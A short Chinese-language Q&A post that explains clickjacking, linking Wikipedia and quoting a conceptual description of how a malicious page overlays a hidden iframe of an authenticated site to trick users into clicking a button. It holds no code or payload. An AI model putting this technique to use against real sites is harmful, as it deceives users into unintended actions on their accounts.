我听到有人提到理论上可以在内容之上放置一个不可见的iframe,并接收某人想要放入表单的输入.这怎么可能而且不会引起怀疑?吓到我了…
解决方法
对的,这是可能的!它被称为clickjacking,确实非常真实.查看此信息以获取更多信息:
http://en.wikipedia.org/wiki/Clickjacking
Google的Michal Zalewski有一个理论上的例子(来源:Page 1,Page 2):
A malicious page in domain A may create an IFRAME pointing to an application in domain B,to which the user is currently authenticated with cookies,” Zalewski said in a message to a mailing list on Thursday. “The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B,such as ‘delete all items,’ ‘click to add Bob as a friend,’ etc. It may then provide [its] own,misleading UI that implies that the button serves a different purpose and is a part of site A,inviting the user to click it.